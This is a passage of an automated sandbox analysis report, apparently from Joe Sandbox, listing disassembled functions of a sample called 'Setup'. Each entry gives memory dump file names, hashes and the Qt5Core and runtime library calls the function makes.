                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@String@@@$?beginGroup@Latin1Settings@@
                                                                                                                                                              • String ID: Policies$StrictTransportSecurity
                                                                                                                                                              • API String ID: 2199165388-150398989
                                                                                                                                                              • Opcode ID: 049dec6478e2245b03af30e8858d7da79c7373dd77a5cf3d425b5c050def02da
                                                                                                                                                              • Instruction ID: af31f32c86213d3908034bdcf64b6f9fe84bfdd7d0de4237c01a648269ea7528
                                                                                                                                                              • Opcode Fuzzy Hash: 049dec6478e2245b03af30e8858d7da79c7373dd77a5cf3d425b5c050def02da
                                                                                                                                                              • Instruction Fuzzy Hash: CF11F1A250DB8696DB228F24E4400AAB371FB99718F545232DFDD06528EF3CD689CF00
                                                                                                                                                              Function 00007FFBA19D04D0 Relevance: 13.7, APIs: 9, Instructions: 202COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Variant@@$?dispose@Data@1@@Data@@List$?const?convert@?userData@Int@Type@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1108074453-0
                                                                                                                                                              • Opcode ID: b5b6ab2caf4c0600de8dae5f70e2c52984aa91c0f30ec555ccca8f257d7ff96c
                                                                                                                                                              • Instruction ID: c19422fc211d2df08a75213df675a90752c55c00e0a9c8d14a60585de723828f
                                                                                                                                                              • Opcode Fuzzy Hash: b5b6ab2caf4c0600de8dae5f70e2c52984aa91c0f30ec555ccca8f257d7ff96c
                                                                                                                                                              • Instruction Fuzzy Hash: E181A676B0AA4686EB928F35D4502BD6361FB84B98F9D4136DE4E07764DE3CD446CF00
                                                                                                                                                              Function 00007FFBA1A29E50 Relevance: 13.6, APIs: 9, Instructions: 128COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA1A43750: ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFBA1A43864
                                                                                                                                                                • Part of subcall function 00007FFBA1A43750: ??1QMutexLocker@@QEAA@XZ.QT5CORE ref: 00007FFBA1A43880
                                                                                                                                                              • ?lock@QMutex@@QEAAXXZ.QT5CORE(?,?,?,?,?,?,?,?,00007FFBA1A410AE,?,?,00000000,00007FFBA1A28162), ref: 00007FFBA1A29E78
                                                                                                                                                              • ?createData@QMapDataBase@@SAPEAU1@XZ.QT5CORE(?,?,?,?,?,?,?,?,00007FFBA1A410AE,?,?,00000000,00007FFBA1A28162), ref: 00007FFBA1A29F52
                                                                                                                                                                • Part of subcall function 00007FFBA1A224A0: ?createNode@QMapDataBase@@QEAAPEAUQMapNodeBase@@HHPEAU2@_N@Z.QT5CORE ref: 00007FFBA1A224C8
                                                                                                                                                                • Part of subcall function 00007FFBA1A224A0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1A224D9
                                                                                                                                                                • Part of subcall function 00007FFBA1A224A0: ??0QVariant@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1A224E7
                                                                                                                                                                • Part of subcall function 00007FFBA1A224A0: ?color@QMapNodeBase@@QEBA?AW4Color@1@XZ.QT5CORE ref: 00007FFBA1A224F0
                                                                                                                                                                • Part of subcall function 00007FFBA1A224A0: ?setColor@QMapNodeBase@@QEAAXW4Color@1@@Z.QT5CORE ref: 00007FFBA1A224FB
                                                                                                                                                                • Part of subcall function 00007FFBA1A224A0: ?setParent@QMapNodeBase@@QEAAXPEAU1@@Z.QT5CORE ref: 00007FFBA1A2251C
                                                                                                                                                                • Part of subcall function 00007FFBA1A224A0: ?setParent@QMapNodeBase@@QEAAXPEAU1@@Z.QT5CORE ref: 00007FFBA1A22547
                                                                                                                                                              • ?setParent@QMapNodeBase@@QEAAXPEAU1@@Z.QT5CORE(?,?,?,?,?,?,?,?,00007FFBA1A410AE,?,?,00000000,00007FFBA1A28162), ref: 00007FFBA1A29F7B
                                                                                                                                                              • ?recalcMostLeftNode@QMapDataBase@@QEAAXXZ.QT5CORE(?,?,?,?,?,?,?,?,00007FFBA1A410AE,?,?,00000000,00007FFBA1A28162), ref: 00007FFBA1A29F84
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,00007FFBA1A410AE,?,?,00000000,00007FFBA1A28162), ref: 00007FFBA1A29FCC
                                                                                                                                                              • ??1QVariant@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,00007FFBA1A410AE,?,?,00000000,00007FFBA1A28162), ref: 00007FFBA1A29FD6
                                                                                                                                                              • ?freeTree@QMapDataBase@@QEAAXPEAUQMapNodeBase@@H@Z.QT5CORE(?,?,?,?,?,?,?,?,00007FFBA1A410AE,?,?,00000000,00007FFBA1A28162), ref: 00007FFBA1A2A005
                                                                                                                                                              • ?freeData@QMapDataBase@@SAXPEAU1@@Z.QT5CORE(?,?,?,?,?,?,?,?,00007FFBA1A410AE,?,?,00000000,00007FFBA1A28162), ref: 00007FFBA1A2A00E
                                                                                                                                                              • ??1QMutexLocker@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,00007FFBA1A410AE,?,?,00000000,00007FFBA1A28162), ref: 00007FFBA1A2A03D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Base@@$Node$Data$?setU1@@$Parent@$?create?freeArray@@ByteData@Locker@@MutexNode@V0@@Variant@@$?color@?dispose@?lock@?recalcColor@Color@1@Color@1@@Data@1@@Data@@LeftListMostMutex@@Tree@U2@_
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3892431818-0
                                                                                                                                                              • Opcode ID: bcd97469e92dda87db8fa481338221eac320456941b9ed2bfef641007a5593b0
                                                                                                                                                              • Instruction ID: 566e616ab425d4f0c55ae8835acd1f1f0125166e96fd1a747bca66545cf2649d
                                                                                                                                                              • Opcode Fuzzy Hash: bcd97469e92dda87db8fa481338221eac320456941b9ed2bfef641007a5593b0
                                                                                                                                                              • Instruction Fuzzy Hash: 78516CB2A0AB4297DB96DF35E4901AD7360FB44B50B444136DFAE43AA5EF3CE465CB00
                                                                                                                                                              Function 00007FFBA19F6970 Relevance: 13.6, APIs: 9, Instructions: 122COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$?append@?detach_grow@?dispose@?end@Data@1@Data@1@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2334897397-0
                                                                                                                                                              • Opcode ID: b3f1beced083453213ad4c9c9faf8b41feb88cac5b5f0666324e5440fe3e7a6c
                                                                                                                                                              • Instruction ID: a3f61aff7f488172e8bd66e53b4cb0285ad535bf24b87288876a52425de19c8e
                                                                                                                                                              • Opcode Fuzzy Hash: b3f1beced083453213ad4c9c9faf8b41feb88cac5b5f0666324e5440fe3e7a6c
                                                                                                                                                              • Instruction Fuzzy Hash: ED41B2B670AB4286DF629F66E4501697361FF84BA5F498131CEAD07754DF3CD44ACB00
                                                                                                                                                              Function 00007FFBA19F43C0 Relevance: 13.6, APIs: 9, Instructions: 118COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$?append@?detach_grow@?dispose@?end@Data@1@Data@1@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2334897397-0
                                                                                                                                                              • Opcode ID: 9fcf0476a9c44d1f9dfc33a72541c66f0dd35ed7202e54ca7b647fe2655306ce
                                                                                                                                                              • Instruction ID: 09e11b9701a35cff2bfcbbea2bf0909c328c673f40005e853ffc2dae4b9d3c08
                                                                                                                                                              • Opcode Fuzzy Hash: 9fcf0476a9c44d1f9dfc33a72541c66f0dd35ed7202e54ca7b647fe2655306ce
                                                                                                                                                              • Instruction Fuzzy Hash: 0741BDB6B0AB0282DF629F65E444169B3A1FF84FA5B498132DE6D07764EF3CD446CB00
                                                                                                                                                              Function 00007FFBA1A41280 Relevance: 13.6, APIs: 9, Instructions: 111COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$?append@?detach_grow@?dispose@?end@Data@1@Data@1@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2334897397-0
                                                                                                                                                              • Opcode ID: d3e17751339ceffbc2f5885f15fa430a1d23a0409c4a5ff071a31ba0b95d821a
                                                                                                                                                              • Instruction ID: 38a1ac08db7c7f6546596ddbc323c2762c121f73cf93ebac8bd6d0f05820b89a
                                                                                                                                                              • Opcode Fuzzy Hash: d3e17751339ceffbc2f5885f15fa430a1d23a0409c4a5ff071a31ba0b95d821a
                                                                                                                                                              • Instruction Fuzzy Hash: 21418472B49B4282DFA19F21E4501B9A361FF85BA1F484132DEAD57B64EF7CE445CB00
                                                                                                                                                              Function 00007FFBA1973930 Relevance: 13.6, APIs: 9, Instructions: 111COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$?append@?detach_grow@?dispose@?end@Data@1@Data@1@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2334897397-0
                                                                                                                                                              • Opcode ID: b8df915398c879ffaa24701ea3f0a9709567eeebe9015f83c519f5150b29757a
                                                                                                                                                              • Instruction ID: 8bdb23a8110ed59b7ac8dc505247b825faa51985eeb5dcaed4082c2eed996b60
                                                                                                                                                              • Opcode Fuzzy Hash: b8df915398c879ffaa24701ea3f0a9709567eeebe9015f83c519f5150b29757a
                                                                                                                                                              • Instruction Fuzzy Hash: 9C419176B09B4282DF619F21E8401B9B365FF85BA4F884132DE5E17764DE7CE146CB00
                                                                                                                                                              Function 00007FFBA1972C20 Relevance: 13.6, APIs: 9, Instructions: 109memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE(?,?,?,00007FFBA1972112,?,?,07F00000,00007FFBA1972641,?,?,00000000,00000000,00007FFBA1971B2D), ref: 00007FFBA1972C62
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,00007FFBA1972112,?,?,07F00000,00007FFBA1972641,?,?,00000000,00000000,00007FFBA1971B2D), ref: 00007FFBA1972C77
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,00007FFBA1972112,?,?,07F00000,00007FFBA1972641,?,?,00000000,00000000,00007FFBA1971B2D), ref: 00007FFBA1972C86
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,00007FFBA1972112,?,?,07F00000,00007FFBA1972641,?,?,00000000,00000000,00007FFBA1971B2D), ref: 00007FFBA1972C9B
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,00007FFBA1972112,?,?,07F00000,00007FFBA1972641,?,?,00000000,00000000,00007FFBA1971B2D), ref: 00007FFBA1972CC2
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,00007FFBA1972112,?,?,07F00000,00007FFBA1972641,?,?,00000000,00000000,00007FFBA1971B2D), ref: 00007FFBA1972CD0
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,00007FFBA1972112,?,?,07F00000,00007FFBA1972641,?,?,00000000,00000000,00007FFBA1971B2D), ref: 00007FFBA1972CDE
                                                                                                                                                              • memmove.VCRUNTIME140(?,?,?,00007FFBA1972112,?,?,07F00000,00007FFBA1972641,?,?,00000000,00000000,00007FFBA1971B2D), ref: 00007FFBA1972D1B
                                                                                                                                                              • ?deallocate@QArrayData@@SAXPEAU1@_K1@Z.QT5CORE(?,?,?,00007FFBA1972112,?,?,07F00000,00007FFBA1972641,?,?,00000000,00000000,00007FFBA1971B2D), ref: 00007FFBA1972D64
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array$Data@@$?data@Array@@ByteV0@@$U1@_$?allocate@?deallocate@AllocationData@@@@@Flags@Option@memmove
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1655712020-0
                                                                                                                                                              • Opcode ID: 3ba1aa0b7d94fdcb62469fb4b48d419667ed8bb27da82aadee3238efc443106b
                                                                                                                                                              • Instruction ID: 4ecc6b6ededdada56b0b1b168f59962ebef3bc54ba8ce473c7e79bffacbda7be
                                                                                                                                                              • Opcode Fuzzy Hash: 3ba1aa0b7d94fdcb62469fb4b48d419667ed8bb27da82aadee3238efc443106b
                                                                                                                                                              • Instruction Fuzzy Hash: 894190B2B09A8286DB55CF26D84406D73A5FB84FD8B888132DE1D47B64EF3CE446CB00
                                                                                                                                                              Function 00007FFBA1975490 Relevance: 13.6, APIs: 9, Instructions: 109COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$?append@?detach_grow@?dispose@?end@Data@1@Data@1@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2334897397-0
                                                                                                                                                              • Opcode ID: 9815435e4fb0fcef3e35b2adb5c72c207117c2e57721c24ee145db4e31330bd4
                                                                                                                                                              • Instruction ID: c806d2fd9898aee2fa03d1385d025a03be4a6a370adc49cfd015b234bab3ea73
                                                                                                                                                              • Opcode Fuzzy Hash: 9815435e4fb0fcef3e35b2adb5c72c207117c2e57721c24ee145db4e31330bd4
                                                                                                                                                              • Instruction Fuzzy Hash: F741A276B1AB4282EFA19F21E4501B9A361FF85BA4F884131DE5E47764DE7CE446CF00
                                                                                                                                                              Function 00007FFBA1975640 Relevance: 13.6, APIs: 9, Instructions: 109COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$?append@?detach_grow@?dispose@?end@Array@@ByteData@1@Data@1@@String@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 765943676-0
                                                                                                                                                              • Opcode ID: 54d88152fd9fa8f81659ea8e68f9f753efccd37ee417825d7d97746001e2d8c1
                                                                                                                                                              • Instruction ID: bfac4207d696c981f4d9b7c53d50d0cb094f667de1b80195e6e32b0bb3bc72ee
                                                                                                                                                              • Opcode Fuzzy Hash: 54d88152fd9fa8f81659ea8e68f9f753efccd37ee417825d7d97746001e2d8c1
                                                                                                                                                              • Instruction Fuzzy Hash: DA4184B6B0AA4286EFA19F21E4401B9A361FF85BA5F884132DE5D07764DE7CE445CF00
                                                                                                                                                              Function 00007FFBA1991B20 Relevance: 13.6, APIs: 9, Instructions: 101COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@ListV0@@$Array@@Byte$?begin@DateTime@@$?detach@?dispose@?end@BasicData@1@Data@1@@Timer@@Url@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 571998211-0
                                                                                                                                                              • Opcode ID: 655ac5332461f24043b4497272bdc2107ce545bc39415eee02f13e67b19fd737
                                                                                                                                                              • Instruction ID: eecff799bd54ec54f7d9949e1051988aed69579d2c377646ff6964b576aca137
                                                                                                                                                              • Opcode Fuzzy Hash: 655ac5332461f24043b4497272bdc2107ce545bc39415eee02f13e67b19fd737
                                                                                                                                                              • Instruction Fuzzy Hash: AC419C76A0AA8686EB918F35E44017D7361FB85BA8F144132DF5D07BA8EF3DD846CB00
                                                                                                                                                              Function 00007FFBA19EDCB0 Relevance: 13.6, APIs: 9, Instructions: 93memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE(?,?,00000000,00007FFBA19EDB1F), ref: 00007FFBA19EDCF1
                                                                                                                                                              • ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE(?,?,00000000,00007FFBA19EDB1F), ref: 00007FFBA19EDD26
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,00000000,00007FFBA19EDB1F), ref: 00007FFBA19EDD3B
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,00000000,00007FFBA19EDB1F), ref: 00007FFBA19EDD4A
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,00000000,00007FFBA19EDB1F), ref: 00007FFBA19EDD5E
                                                                                                                                                              • memmove.VCRUNTIME140(?,?,00000000,00007FFBA19EDB1F), ref: 00007FFBA19EDD74
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,00000000,00007FFBA19EDB1F), ref: 00007FFBA19EDDB8
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,00000000,00007FFBA19EDB1F), ref: 00007FFBA19EDDC1
                                                                                                                                                              • ?deallocate@QArrayData@@SAXPEAU1@_K1@Z.QT5CORE(?,?,00000000,00007FFBA19EDB1F), ref: 00007FFBA19EDDD4
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array$Data@@$?data@$U1@_$?allocate@AllocationData@@@@@Flags@Option@$?deallocate@memmove
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2627627040-0
                                                                                                                                                              • Opcode ID: b7faffb152a9e85853e34852b2eca4067ca66f18fa3aec0ce77517458aab2f29
